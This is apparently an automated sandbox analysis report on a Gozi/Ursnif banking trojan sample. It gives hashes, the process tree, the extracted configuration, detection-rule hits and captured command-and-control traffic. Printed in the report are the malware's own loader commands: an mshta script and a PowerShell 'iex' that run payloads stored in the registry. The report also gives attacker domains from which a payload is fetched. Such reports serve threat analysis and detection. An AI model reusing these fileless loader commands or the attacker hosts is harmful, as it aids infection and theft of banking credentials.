Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295

Overview

General Information

Sample Name:	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.14295 (renamed file extension from 14295 to dll)
Analysis ID:	343096
MD5:	81f401defa8faa2e4745590bc4f6c008
SHA1:	bddb75a5aa6ed1272307ee096b59e2e61076a6f9
SHA256:	74cc533238ae33245519b52784db0e6adbd3380b350717fdc69d4e36714173d5
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Gozi e-Banking trojan

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6000 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

regsvr32.exe (PID: 2628 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

control.exe (PID: 1576 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

rundll32.exe (PID: 3524 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cmd.exe (PID: 4828 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

iexplore.exe (PID: 4112 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6076 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 5620 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6156 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:82970 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4700 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4112 CREDAT:17432 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 5960 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6988 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 5336 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5304 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5696 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 6380 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 5984 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "401", "system": "ad51e028b41086c1a9f4c3463eb17f2ehh", "size": "201292", "crc": "2", "action": "00000000", "id": "3300", "time": "1611307439", "user": "902d52678695dc15e71ab15cd837ada4", "hash": "0xa6ea74ae", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp	GoziRule	Win32.Gozi	CCN-CERT	0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 6988	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 12 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6988, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline', ProcessId: 5336

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5960, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 6988

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6988, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline', ProcessId: 5336

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 1576, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 3524

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: regsvr32.exe.2628.2.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250171", "uptime": "401", "system": "ad51e028b41086c1a9f4c3463eb17f2ehh", "size": "201292", "crc": "2", "action": "00000000", "id": "3300", "time": "1611307439", "user": "902d52678695dc15e71ab15cd837ada4", "hash": "0xa6ea74ae", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at

Virustotal: Detection: 8%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Virustotal: Detection: 33%			Perma Link
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	ReversingLabs: Detection: 25%

Compliance:

Uses 32bit PE files

Show sources

Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.925789248.000002946AE90000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.938527540.000001F33B7D0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: \fk.pdb$. source: powershell.exe, 0000001A.00000003.995503256.000001E7C3283000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source:	Binary string: c:\climbThrough\Bedclear\ranCentury\Exercise.pdb source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp

Spreading:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FC4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FAE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05FB888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\explorer.exe	Code function: 36_2_04DAECE0 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05FB05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

Networking:

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 151.101.1.44 151.101.1.44

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/sknLedsCbT_2B4wLtS_2FSf/C8Q4jriZvv/cHfqhQ9vl0vZGO5GP/AoJz8AHspssc/PRZs4sKJRg7/jH1SdHxUwyz5RQ/XuBuvpY5vvQV4LqIVVPRo/Z9PjsLKqohem6vf_/2FPMNyhDVIs00yE/BuUcdk1zY69hPWFKWm/NvZlHdA31/78WizcFNxnStriaFjzK7/v_2FVVwIwtM_2F54f79/vZDSa6ivA8gkZONEyW9488/C4H0pr8tv19LW/ZXxXdBMw/kw85mxmCjJ_2Bu32ObSyLwF/Yo3etxqqFR/p7BRLvnXvFdgAAGGn/C_2BCacpFUZ1/tah HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/8t0bR6VsCGA/ZdsVj6T4k_2FoN/BLdu_2BpSFXqKfcNrQm0V/ev0hudV9ITNV8_2B/N1NUzrdZB3VXtwr/czINvqLVnHAqL34hBx/_2F4Uw8ch/lO8_2BdQScLQi_2B7dkM/Y6U5VEgT5klQ01W1Rxk/oP4yI983nfNNLWO0FdmkwO/SlYApRJyCflSJ/F9Sp1wFu/11p6fGFU0cz_2F0ouRmTqJI/Jp2cYIM8B8/Yut84Zr03wWkVJ8HW/_2Bs4q032lo5/cXLpMBT2Oue/wmMCk0Do0CwkFa/R5_2BwVrdhg4SycoUpM1q/WdY_2FMtLacKdQm6/_2B87YclJ9Jv74j/B_2BPGCFKoDrv4QA/twu HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/CVkO0YtaI5O0rIFRU/dT4qwboWJixM/lD45ufaeNnI/cacgVxu7PaX2PX/1lYOIQMGvnkM47oJxaNOf/hFcn44i0YUVm90w4/QXHrnAASK_2F13d/5oQ_2F_2FIecjTnC8w/7KFf5o_2B/DvKXcUwkTj3k34oyPZ_2/BQTne0TWIY5r0yyHLCZ/QdvKBv0OKuZfpJiCfSiXDe/gwqygzT9hF5O5/iOEj4dxL/R_2FX_2Fv0bMpcldKbASVEW/DM59OBVxq7/9d4nMpuM8bNhV0TMy/RR84HPz6HIaw/UUGT2Q4OKHA/IoB4n4vcvYeMKu/tNuRkRQ0aDraFPOIy8Iid/GXrqJWUbrs/H HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/qid4UkFjrmJwDqv1uGoy3/_2BUJEVRCzS4dgw_/2BQScQk8a3HbiWi/d_2FOUrdxgv_2FzWHk/Apf0FwjNI/XCjSe3QcK9lg8PEDHYq_/2BEZPUJgDqlWZMm5T6e/5VAYvXDHpTHy9yII7VkiV8/_2BPKcMGMz7Ef/Vq5I_2Bu/jg1FflNR1bMph_2B7mMw8J7/1wxMorc_2F/N6CisPjn0a1IvUWNq/qjvzUpOhQ3cR/g18ZLbBaZpr/HqIkmdt9eu1lN1/4tABZghNsoNFyNad4ZlYW/GQkzB4t48KvSwznE/J6JNvAHQJAsplh2/rVWvzj4OOGDDMz5k/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at

Source: de-ch[1].htm.5.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.976858944.0000000006BC3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x2ac1dc45,0x01d6f0a0</date><accdate>0x2ac1dc45,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2ac43e92,0x01d6f0a0</date><accdate>0x2ac43e92,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2ac6a0e0,0x01d6f0a0</date><accdate>0x2ac6a0e0,0x01d6f0a0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.5.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
